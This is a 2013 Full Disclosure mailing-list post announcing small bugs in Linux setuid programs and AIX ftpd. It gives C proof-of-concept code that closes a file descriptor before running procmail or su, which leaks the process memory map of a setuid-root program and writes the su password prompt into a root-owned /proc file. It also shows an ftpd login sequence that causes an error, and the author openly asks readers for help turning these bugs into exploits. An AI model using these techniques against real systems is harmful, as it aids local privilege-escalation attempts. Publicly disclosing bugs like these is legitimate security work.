
Full Disclosure mailing list archives
Super Tiny Linux and AIX bugs
From: king cope <isowarez.isowarez.isowarez () googlemail com>
Date: Sun, 11 Aug 2013 23:23:21 +0700
Super Tiny Linux and AIX bugs discovered and exploited by Kctherootkey somewhere between 9.8.2013-11.8.2013

allowed readers are h4x0rz listening to an arbitrary 2pac song, all others please move along :>

uhh, hit em with a little tiny Linux bug.. my tiny Linux bug..

kcope@planetmars:~$ uname -a;cat /etc/debian_version
Linux monokelhost 3.2.0-4-686-pae #1 SMP Debian 3.2.46-1 i686 GNU/Linux
7.1
kcope@planetmars:~$ cat test99.c
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
    /* close stdin so the next open() lands on fd 0 */
    close(0);
    open("/proc/self/maps", O_RDONLY);
    /* procmail now reads its "message" from fd 0 and delivers it to the mailbox */
    execl("/usr/bin/procmail", "procmail", "-d", "kcope", (char *)0);
    return 1;
}
kcope@planetmars:~$ gcc test99.c -o test99
kcope@planetmars:~$ >/var/mail/kcope
kcope@planetmars:~$ ./test99
kcope@planetmars:~$ cat /var/mail/kcope
08048000-0805c000 r-xp 00000000 08:01 144347 /usr/bin/procmail
0805c000-0805d000 r--p 00013000 08:01 144347 /usr/bin/procmail
0805d000-0805e000 rw-p 00014000 08:01 144347 /usr/bin/procmail
08c49000-08c6a000 rw-p 00000000 00:00 0 [heap]
b75a8000-b75b2000 r-xp 00000000 08:01 4908 /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b2000-b75b3000 r--p 00009000 08:01 4908 /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b3000-b75b4000 rw-p 0000a000 08:01 4908 /lib/i386-linux-gnu/i686/cmov/libnss_files-2.13.so
b75b4000-b75bd000 r-xp 00000000 08:01 4920 /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bd000-b75be000 r--p 00008000 08:01 4920 /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75be000-b75bf000 rw-p 00009000 08:01 4920 /lib/i386-linux-gnu/i686/cmov/libnss_nis-2.13.so
b75bf000-b75d2000 r-xp 00000000 08:01 4918 /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d2000-b75d3000 r--p 00012000 08:01 4918 /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d3000-b75d4000 rw-p 00013000 08:01 4918 /lib/i386-linux-gnu/i686/cmov/libnsl-2.13.so
b75d4000-b75d6000 rw-p 00000000 00:00 0
b75d6000-b75dc000 r-xp 00000000 08:01 4910 /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dc000-b75dd000 r--p 00005000 08:01 4910 /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75dd000-b75de000 rw-p 00006000 08:01 4910 /lib/i386-linux-gnu/i686/cmov/libnss_compat-2.13.so
b75de000-b75e0000 rw-p 00000000 00:00 0
b75e0000-b773c000 r-xp 00000000 08:01 4914 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773c000-b773d000 ---p 0015c000 08:01 4914 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773d000-b773f000 r--p 0015c000 08:01 4914 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b773f000-b7740000 rw-p 0015e000 08:01 4914 /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7740000-b7743000 rw-p 00000000 00:00 0
b7743000-b7767000 r-xp 00000000 08:01 4911 /lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7767000-b7768000 r--p 00023000 08:01 4911 /lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b7768000-b7769000 rw-p 00024000 08:01 4911 /lib/i386-linux-gnu/i686/cmov/libm-2.13.so
b776e000-b7770000 rw-p 00000000 00:00 0
b7770000-b7771000 r-xp 00000000 00:00 0 [vdso]
b7771000-b778d000 r-xp 00000000 08:01 58 /lib/i386-linux-gnu/ld-2.13.so
b778d000-b778e000 r--p 0001b000 08:01 58 /lib/i386-linux-gnu/ld-2.13.so
b778e000-b778f000 rw-p 0001c000 08:01 58 /lib/i386-linux-gnu/ld-2.13.so
bfd62000-bfd83000 rw-p 00000000 00:00 0 [stack]

geez! leaks process maps of setuid root executable. should investigate deeper..

kcope@planetmars:~$ cat test99.c
#include <fcntl.h>
#include <unistd.h>

int main(void)
{
    /* close stderr so the next open() lands on fd 2 */
    close(2);
    open("/proc/self/comm", O_RDWR);
    /* whatever su writes to stderr now goes into its own /proc/<pid>/comm */
    execl("/bin/su", "su", (char *)0);
    return 1;
}
kcope@planetmars:~$ ./test99
kcope@planetmars:~$ ps aux|grep su
root        12  0.0  0.0     0     0 ?        S    14:19   0:00 [sync_supers]
root      6543  0.0  0.4  4240  1128 pts/0    S+   17:58   0:00 su
kcope     6545  0.0  0.3  3568   820 pts/1    S+   17:58   0:00 grep su
You got mail in /var/mail/kcope !!
kcope@planetmars:~$ ls -la /proc/6543/comm
-rw-r--r-- 1 root root 0 Aug 11 17:58 /proc/6543/comm
kcope@planetmars:~$ cat /proc/6543/comm
Password:

its writing supplied input to root owned files! can somebody, hello lists, give me pointers about how to exploit this, if possible. i know this might be an issue for vuln-dev but I'm a rude boy!

another tiny bug in aix ftpd

kcope@planetmars:~$ nc <ip> 21
220 aix1 FTP server (Version 4.2 Wed Dec 23 11:06:15 CST 2009) ready.
user ftp
331 Guest login ok, send ident as password.
pass ftp
230-Last unsuccessful login: Sat Aug 10 19:23:18 EDT 2013 on ssh from planetmars
230-Last login: Sun Aug 11 11:03:41 EDT 2013 on ftp from planetmars
230 Guest login ok, access restrictions apply.
user root
421 ftpd: get_auth_methods() failed: Bad file number
421 root cannot authenticate to server

connection closes and ftpd might coredump.. can somebody please truss the process and tell me what file it wants to open? this might be exploitable. thanks a lot!

/Kctherootkey

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/